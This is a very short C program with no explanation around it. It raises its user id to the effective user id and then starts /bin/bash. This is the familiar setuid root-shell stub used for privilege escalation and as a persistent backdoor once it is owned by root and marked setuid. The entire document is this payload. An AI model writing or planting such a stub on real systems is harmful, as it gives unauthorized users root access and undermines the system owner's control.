int main(int argc, char **argv) {
        setuid(geteuid());
        execl("/bin/bash", "bash", 0);
}

